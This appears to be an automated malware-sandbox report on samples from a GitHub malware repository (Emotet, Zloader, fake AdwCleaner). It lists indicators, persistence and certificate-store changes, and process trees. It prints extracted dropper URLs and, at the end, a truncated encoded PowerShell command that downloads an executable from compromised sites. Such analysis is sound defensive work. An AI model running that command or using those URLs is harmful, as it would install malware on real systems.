hxxps://github[.]com/Da2dalus/The-MALWARE-Repo

Analysis

max time kernel
187s
max time network
195s
platform
windows10-1703_x64
resource
win10-20240611-en
resource tags

arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
submitted
21-07-2024 10:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Da2dalus/The-MALWARE-Repo

Score

10^/10

macro persistence xlm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://blockchainjoblist.com/wp-admin/014080/

exe.dropper

https://womenempowermentpakistan.com/wp-admin/paba5q52/

exe.dropper

https://atnimanvilla.com/wp-content/073735/

exe.dropper

https://yeuquynhnhai.com/upload/41830/

exe.dropper

https://deepikarai.com/js/4bzs6/

Extracted

Language

xlm4.0

Source

URLs

xlm40.dropper

https://erpoweredent.at/3/zte.dll

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exerundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5192	776	powershell.exe
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	5452	5792	rundll32.exe	EXCEL.EXE

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

141 5192 powershell.exe
144 5192 powershell.exe
146 5192 powershell.exe
Downloads MZ/PE file

flow	pid	process
141	5192	powershell.exe
144	5192	powershell.exe
146	5192	powershell.exe

Suspicious Office macro 1 IoCs

Office document equipped with 4.0 macros.

macro xlm

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\Zloader.-3lblloN.xlsm.part	office_xlm_macros

Executes dropped EXE 3 IoCs

Processes:

AdwereCleaner.exe6AdwCleaner.exeCookieClickerHack.exe

pid process

4468 AdwereCleaner.exe
4760 6AdwCleaner.exe
3604 CookieClickerHack.exe

pid	process
4468	AdwereCleaner.exe
4760	6AdwCleaner.exe
3604	CookieClickerHack.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

6AdwCleaner.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\6AdwCleaner.exe\" -auto"	6AdwCleaner.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
File opened (read-only)	\??\N:	EXCEL.EXE
File opened (read-only)	\??\T:	EXCEL.EXE
File opened (read-only)	\??\X:	EXCEL.EXE
File opened (read-only)	\??\Z:	EXCEL.EXE
File opened (read-only)	\??\G:	EXCEL.EXE
File opened (read-only)	\??\O:	EXCEL.EXE
File opened (read-only)	\??\S:	EXCEL.EXE
File opened (read-only)	\??\U:	EXCEL.EXE
File opened (read-only)	\??\V:	EXCEL.EXE
File opened (read-only)	\??\Y:	EXCEL.EXE
File opened (read-only)	\??\B:	EXCEL.EXE
File opened (read-only)	\??\M:	EXCEL.EXE
File opened (read-only)	\??\W:	EXCEL.EXE
File opened (read-only)	\??\P:	EXCEL.EXE
File opened (read-only)	\??\A:	EXCEL.EXE
File opened (read-only)	\??\E:	EXCEL.EXE
File opened (read-only)	\??\H:	EXCEL.EXE
File opened (read-only)	\??\I:	EXCEL.EXE
File opened (read-only)	\??\J:	EXCEL.EXE
File opened (read-only)	\??\K:	EXCEL.EXE
File opened (read-only)	\??\L:	EXCEL.EXE
File opened (read-only)	\??\Q:	EXCEL.EXE
File opened (read-only)	\??\R:	EXCEL.EXE

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

Processes:

flow	ioc
91	raw.githubusercontent.com
92	raw.githubusercontent.com
93	raw.githubusercontent.com
94	raw.githubusercontent.com
95	raw.githubusercontent.com
97	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NSIS installer 3 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\AdwereCleaner.PaxIx1pj.exe.part	nsis_installer_2
C:\Users\Admin\Downloads\AdwereCleaner.exe	nsis_installer_1
C:\Users\Admin\Downloads\AdwereCleaner.exe	nsis_installer_2

Checks processor information in registry 2 TTPs 11 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exeWINWORD.EXEEXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXEEXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE

Modifies registry class 1 IoCs

Processes:

firefox.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings firefox.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

6AdwCleaner.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\E12DFB4B41D7D9C32B30514BAC1D81D8385E2D46\Blob = 5c000000010000000400000000080000190000000100000010000000e843ac3b52ec8c297fa948c9b1fb2819030000000100000014000000e12dfb4b41d7d9c32b30514bac1d81d8385e2d4668000000010000000800000000409120d035d9017e0000000100000008000000000063f58926d7011d0000000100000010000000f919b9ccce1e59c2e785f7dc2ccf6708140000000100000014000000daed6474149c143cabdd99a9bd5b284d8b3cc9d86200000001000000200000006fff78e400a70c11011cd85977c459fb5af96a3df0540820d0f4b8607875e58f090000000100000022000000302006082b06010505070303060a2b0601040182370a030406082b060105050703080b000000010000002a0000005300650063007400690067006f0020002800550054004e0020004f0062006a00650063007400290000000f0000000100000014000000f45a0858c9cd920e647bad539ab9f1cfc77f24cb040000000100000010000000a7f2e41606411150306b9ce3b49cb0c920000000010000006a040000308204663082034ea003020102021044be0c8b500024b411d3362de0b35f1b300d06092a864886f70d0101050500308195310b3009060355040613025553310b3009060355040813025554311730150603550407130e53616c74204c616b652043697479311e301c060355040a131554686520555345525452555354204e6574776f726b3121301f060355040b1318687474703a2f2f7777772e7573657274727573742e636f6d311d301b0603550403131455544e2d5553455246697273742d4f626a656374301e170d3939303730393138333132305a170d3139303730393138343033365a308195310b3009060355040613025553310b3009060355040813025554311730150603550407130e53616c74204c616b652043697479311e301c060355040a131554686520555345525452555354204e6574776f726b3121301f060355040b1318687474703a2f2f7777772e7573657274727573742e636f6d311d301b0603550403131455544e2d5553455246697273742d4f626a65637430820122300d06092a864886f70d01010105000382010f003082010a0282010100ceaa813fa3a36178aa31005595119e270f1f1cdf3a9b826830c04a611df12f0efabe79f7a523ef55519684cddbe3b96e3e31d80a2067c7f4d9bf94eb47043e02ce2aa25d870409f6309d188a97b2aa1cfc41d2a136cbfb3d91bae7d97035fae4e790c39ba39bd33cf5129977b1b709e068e61cb8f39463886a6afe0b76c9bef422e467b9ab1a5e77c18507dd0d6cbfee06c7776a419ea70fd7fbee9417b7fc85bea4abc41c31ddd7b6d1e4f0efdf168fb25293d7a1d489a1072ebfe10112421e1ae1d89534db647928ffba2e11c2e5e85b9248fb470bc26cdaad328341f3a5e54170fd65906dfafa51c4f9bd962b19042cd36da7dcf07f6f8365e26aab8786750203010001a381af3081ac300b0603551d0f0404030201c6300f0603551d130101ff040530030101ff301d0603551d0e04160414daed6474149c143cabdd99a9bd5b284d8b3cc9d830420603551d1f043b30393037a035a0338631687474703a2f2f63726c2e7573657274727573742e636f6d2f55544e2d5553455246697273742d4f626a6563742e63726c30290603551d250422302006082b0601050507030306082b06010505070308060a2b0601040182370a0304300d06092a864886f70d01010505000382010100081f52b1374478dbfdceb9da959698aa556480b55a40dd21a5c5c1f35f2c4cc8475a69eae8f03535f4d025f3c8a6a4874abd1bb17308bdd4c3cab635bb59867731cda78014ae13effcb148f96b25252d51b62c6d45c198c88a565d3eee434e3e6b278ed03a4b850b5fd3ed6aa775cbd15a872f3975135a72b002819fbef00f845420626c69d4e14dc60d9943010d12968c789dbf50a2b144aa6acf177acf6f0fd4f824555ff0341649663e5046c96371383162b862b9f353ad6cb52ba212aa194f09da5ee793c68e1408fef0308018a086854dc87dd78b03fe6ed5f79d16ac922ca023e59c91521f94df179473c3b3c1c17105200078bd13521da83ecd001fc8	6AdwCleaner.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\E12DFB4B41D7D9C32B30514BAC1D81D8385E2D46	6AdwCleaner.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\E12DFB4B41D7D9C32B30514BAC1D81D8385E2D46\Blob = 040000000100000010000000a7f2e41606411150306b9ce3b49cb0c90f0000000100000014000000f45a0858c9cd920e647bad539ab9f1cfc77f24cb0b000000010000002a0000005300650063007400690067006f0020002800550054004e0020004f0062006a0065006300740029000000090000000100000022000000302006082b06010505070303060a2b0601040182370a030406082b060105050703086200000001000000200000006fff78e400a70c11011cd85977c459fb5af96a3df0540820d0f4b8607875e58f140000000100000014000000daed6474149c143cabdd99a9bd5b284d8b3cc9d81d0000000100000010000000f919b9ccce1e59c2e785f7dc2ccf67087e0000000100000008000000000063f58926d70168000000010000000800000000409120d035d901030000000100000014000000e12dfb4b41d7d9c32b30514bac1d81d8385e2d46190000000100000010000000e843ac3b52ec8c297fa948c9b1fb281920000000010000006a040000308204663082034ea003020102021044be0c8b500024b411d3362de0b35f1b300d06092a864886f70d0101050500308195310b3009060355040613025553310b3009060355040813025554311730150603550407130e53616c74204c616b652043697479311e301c060355040a131554686520555345525452555354204e6574776f726b3121301f060355040b1318687474703a2f2f7777772e7573657274727573742e636f6d311d301b0603550403131455544e2d5553455246697273742d4f626a656374301e170d3939303730393138333132305a170d3139303730393138343033365a308195310b3009060355040613025553310b3009060355040813025554311730150603550407130e53616c74204c616b652043697479311e301c060355040a131554686520555345525452555354204e6574776f726b3121301f060355040b1318687474703a2f2f7777772e7573657274727573742e636f6d311d301b0603550403131455544e2d5553455246697273742d4f626a65637430820122300d06092a864886f70d01010105000382010f003082010a0282010100ceaa813fa3a36178aa31005595119e270f1f1cdf3a9b826830c04a611df12f0efabe79f7a523ef55519684cddbe3b96e3e31d80a2067c7f4d9bf94eb47043e02ce2aa25d870409f6309d188a97b2aa1cfc41d2a136cbfb3d91bae7d97035fae4e790c39ba39bd33cf5129977b1b709e068e61cb8f39463886a6afe0b76c9bef422e467b9ab1a5e77c18507dd0d6cbfee06c7776a419ea70fd7fbee9417b7fc85bea4abc41c31ddd7b6d1e4f0efdf168fb25293d7a1d489a1072ebfe10112421e1ae1d89534db647928ffba2e11c2e5e85b9248fb470bc26cdaad328341f3a5e54170fd65906dfafa51c4f9bd962b19042cd36da7dcf07f6f8365e26aab8786750203010001a381af3081ac300b0603551d0f0404030201c6300f0603551d130101ff040530030101ff301d0603551d0e04160414daed6474149c143cabdd99a9bd5b284d8b3cc9d830420603551d1f043b30393037a035a0338631687474703a2f2f63726c2e7573657274727573742e636f6d2f55544e2d5553455246697273742d4f626a6563742e63726c30290603551d250422302006082b0601050507030306082b06010505070308060a2b0601040182370a0304300d06092a864886f70d01010505000382010100081f52b1374478dbfdceb9da959698aa556480b55a40dd21a5c5c1f35f2c4cc8475a69eae8f03535f4d025f3c8a6a4874abd1bb17308bdd4c3cab635bb59867731cda78014ae13effcb148f96b25252d51b62c6d45c198c88a565d3eee434e3e6b278ed03a4b850b5fd3ed6aa775cbd15a872f3975135a72b002819fbef00f845420626c69d4e14dc60d9943010d12968c789dbf50a2b144aa6acf177acf6f0fd4f824555ff0341649663e5046c96371383162b862b9f353ad6cb52ba212aa194f09da5ee793c68e1408fef0308018a086854dc87dd78b03fe6ed5f79d16ac922ca023e59c91521f94df179473c3b3c1c17105200078bd13521da83ecd001fc8	6AdwCleaner.exe

NTFS ADS 4 IoCs

Processes:

firefox.exe

description	ioc	process
File created	C:\Users\Admin\Downloads\AdwereCleaner.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Emotet.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Zloader.xlsm:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\CookieClickerHack.exe:Zone.Identifier	firefox.exe

Suspicious behavior: AddClipboardFormatListener 3 IoCs

Processes:

WINWORD.EXEEXCEL.EXE

pid process

348 WINWORD.EXE
348 WINWORD.EXE
5792 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exe

pid process

5192 powershell.exe
5192 powershell.exe
5192 powershell.exe
5192 powershell.exe

pid	process
348	WINWORD.EXE
348	WINWORD.EXE
5792	EXCEL.EXE

pid	process
5192	powershell.exe
5192	powershell.exe
5192	powershell.exe
5192	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

firefox.exe6AdwCleaner.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4660	firefox.exe
Token: SeDebugPrivilege	4660	firefox.exe
Token: SeDebugPrivilege	4760	6AdwCleaner.exe
Token: SeDebugPrivilege	4660	firefox.exe
Token: SeDebugPrivilege	5192	powershell.exe
Token: SeDebugPrivilege	4660	firefox.exe
Token: SeDebugPrivilege	4660	firefox.exe
Token: SeDebugPrivilege	4660	firefox.exe
Token: SeDebugPrivilege	4660	firefox.exe

Suspicious use of FindShellTrayWindow 8 IoCs

Processes:

firefox.exeWINWORD.EXEEXCEL.EXE

pid process

4660 firefox.exe
4660 firefox.exe
4660 firefox.exe
4660 firefox.exe
348 WINWORD.EXE
348 WINWORD.EXE
5792 EXCEL.EXE
5792 EXCEL.EXE
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

firefox.exe

pid process

4660 firefox.exe
4660 firefox.exe
4660 firefox.exe

Suspicious use of SetWindowsHookEx 51 IoCs

Processes:

firefox.exe6AdwCleaner.exeWINWORD.EXEEXCEL.EXE

pid	process
4660	firefox.exe
4660	firefox.exe
4660	firefox.exe
4660	firefox.exe
4760	6AdwCleaner.exe
4760	6AdwCleaner.exe
4660	firefox.exe
4660	firefox.exe
4660	firefox.exe
348	WINWORD.EXE
348	WINWORD.EXE
348	WINWORD.EXE
348	WINWORD.EXE
348	WINWORD.EXE
348	WINWORD.EXE
348	WINWORD.EXE
348	WINWORD.EXE
348	WINWORD.EXE
348	WINWORD.EXE
348	WINWORD.EXE
348	WINWORD.EXE
348	WINWORD.EXE
348	WINWORD.EXE
348	WINWORD.EXE
348	WINWORD.EXE
348	WINWORD.EXE
4660	firefox.exe
4660	firefox.exe
4660	firefox.exe
4660	firefox.exe
4660	firefox.exe
4660	firefox.exe
5792	EXCEL.EXE
5792	EXCEL.EXE
5792	EXCEL.EXE
5792	EXCEL.EXE
5792	EXCEL.EXE
5792	EXCEL.EXE
5792	EXCEL.EXE
5792	EXCEL.EXE
5792	EXCEL.EXE
5792	EXCEL.EXE
5792	EXCEL.EXE
5792	EXCEL.EXE
5792	EXCEL.EXE
5792	EXCEL.EXE
5792	EXCEL.EXE
5792	EXCEL.EXE
4660	firefox.exe
4660	firefox.exe
4660	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

firefox.exefirefox.exe

description	pid	process	target process
PID 4368 wrote to memory of 4660	4368	firefox.exe	firefox.exe
PID 4368 wrote to memory of 4660	4368	firefox.exe	firefox.exe
PID 4368 wrote to memory of 4660	4368	firefox.exe	firefox.exe
PID 4368 wrote to memory of 4660	4368	firefox.exe	firefox.exe
PID 4368 wrote to memory of 4660	4368	firefox.exe	firefox.exe
PID 4368 wrote to memory of 4660	4368	firefox.exe	firefox.exe
PID 4368 wrote to memory of 4660	4368	firefox.exe	firefox.exe
PID 4368 wrote to memory of 4660	4368	firefox.exe	firefox.exe
PID 4368 wrote to memory of 4660	4368	firefox.exe	firefox.exe
PID 4368 wrote to memory of 4660	4368	firefox.exe	firefox.exe
PID 4368 wrote to memory of 4660	4368	firefox.exe	firefox.exe
PID 4660 wrote to memory of 800	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 800	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 4268	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 2608	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 2608	4660	firefox.exe	firefox.exe
PID 4660 wrote to memory of 2608	4660	firefox.exe	firefox.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://github.com/Da2dalus/The-MALWARE-Repo"
1⤵
- Suspicious use of WriteProcessMemory
PID:4368

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://github.com/Da2dalus/The-MALWARE-Repo
2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4660

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4660.0.1790098842\2095000258" -parentBuildID 20221007134813 -prefsHandle 1704 -prefMapHandle 1696 -prefsLen 20935 -prefMapSize 233414 -appDir "C:\Program Files\Mozilla Firefox\browser" - {632121d5-ea58-4982-83e9-c89f4dd14e7a} 4660 "\\.\pipe\gecko-crash-server-pipe.4660" 1780 267592b7f58 gpu
3⤵
PID:800

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4660.1.642104738\1447698524" -parentBuildID 20221007134813 -prefsHandle 2144 -prefMapHandle 2140 -prefsLen 21796 -prefMapSize 233414 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d41769d8-b883-4442-95ba-ec18319bb641} 4660 "\\.\pipe\gecko-crash-server-pipe.4660" 2156 26746f72858 socket
3⤵
PID:4268

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4660.2.1717362942\1263197135" -childID 1 -isForBrowser -prefsHandle 2784 -prefMapHandle 2716 -prefsLen 21899 -prefMapSize 233414 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {65b22ef4-0f7c-4a98-ad5a-ea3786ad1221} 4660 "\\.\pipe\gecko-crash-server-pipe.4660" 2988 2675d0dcb58 tab
3⤵
PID:2608

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4660.3.1625983913\184874011" -childID 2 -isForBrowser -prefsHandle 3492 -prefMapHandle 3488 -prefsLen 26212 -prefMapSize 233414 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e95e8f44-51dd-4cbd-a49c-148651d8da6a} 4660 "\\.\pipe\gecko-crash-server-pipe.4660" 3496 2675bc5c558 tab
3⤵
PID:3748

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4660.4.445732767\1883233019" -childID 3 -isForBrowser -prefsHandle 4544 -prefMapHandle 4540 -prefsLen 26195 -prefMapSize 233414 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c573ede1-a105-419c-a1f1-ff1cd66b7eaf} 4660 "\\.\pipe\gecko-crash-server-pipe.4660" 4528 2675f3f4558 tab
3⤵
PID:5116

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4660.5.1986727829\1308694715" -childID 4 -isForBrowser -prefsHandle 5096 -prefMapHandle 5100 -prefsLen 26195 -prefMapSize 233414 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b862bf40-a045-4af4-97ef-67cb2a13f168} 4660 "\\.\pipe\gecko-crash-server-pipe.4660" 5080 26760666b58 tab
3⤵
PID:1564

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4660.6.1222163096\1330314109" -childID 5 -isForBrowser -prefsHandle 4528 -prefMapHandle 5076 -prefsLen 26195 -prefMapSize 233414 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b168cfe7-d467-4a21-84ab-8f4182ce27fa} 4660 "\\.\pipe\gecko-crash-server-pipe.4660" 5164 26760668c58 tab
3⤵
PID:1688

C:\Users\Admin\Downloads\AdwereCleaner.exe
"C:\Users\Admin\Downloads\AdwereCleaner.exe"
3⤵
- Executes dropped EXE
PID:4468

C:\Users\Admin\AppData\Local\6AdwCleaner.exe
"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4760

C:\Users\Admin\Downloads\CookieClickerHack.exe
"C:\Users\Admin\Downloads\CookieClickerHack.exe"
3⤵
- Executes dropped EXE
PID:3604

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3552

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_Emotet.zip\[email protected]" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:348

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0